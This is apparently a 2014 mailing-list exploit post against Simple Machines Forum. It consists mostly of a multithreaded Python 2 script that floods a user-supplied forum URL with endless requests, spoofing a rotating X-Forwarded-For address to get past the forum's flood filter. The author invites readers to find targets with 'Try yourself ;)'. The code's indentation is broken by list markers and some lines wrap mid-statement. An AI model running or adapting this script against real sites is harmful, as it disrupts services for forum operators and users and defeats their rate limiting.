# Exploit Title: SMF Incorrect Flood Filter Headers# Date: 21/08/2014#
Author: Daniel Godoy# Author Mail:
DanielGodoy[at]GobiernoFederal[dot]com# Author Web:
www.delincuentedigital.com.ar# Software: Simple Machine Forum #
http://www.simplemachines.org# Tested on: Linux# DORK: Try yourself ;)

	* #!/usr/bin/python
	* # RemoteExecution
	* #Autor: Daniel Godoy A.K.A hielasangre
	*  
	* import sys, threading, time, urllib2,re
	* print "Ingrese URL: "
	* url = raw_input()
	* a = b = c = d = 1
	* count = 0
	* class SMFPwner(threading.Thread):
	*   def __init__(self, num):
	*       threading.Thread.__init__(self)
	*       self.num = num      
	*   def run(self):
	*     while 1:
	*         global a,b,c,d,count, url
	*         data = ""
	*         while 1:
	*             while 1:
	*                 if d!=250:
	*                     d+=1
	*                 else:
	*                     if c!= 250:
	*                         c+=2
	*                         d=0
	*                     else:
	*                         if b!=250:
	*                             c=0
	*                             d=0
	*                             b+=1
	*                         else:
	*                             a+=1
	*                             b=0
	*                             c=0
	*                             d=0
	*                
head = str(a)+'.'+str(b)+'.'+str(c)+'.'+str(d)
	*                 headers = { 'X-Forwarded-For' : head }
	*                
req = urllib2.Request(url, data, headers)
	*                 f = urllib2.urlopen(req)
	*                 count += 1
	*                 print "[ Visitando => " + url + " Por
" + str(count) +" vez ]"
	* for i in range(3):    
	*  ta = SMFPwner(i)
	*  ta.start()

 http://pastebin.com/TiZc0T05
-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com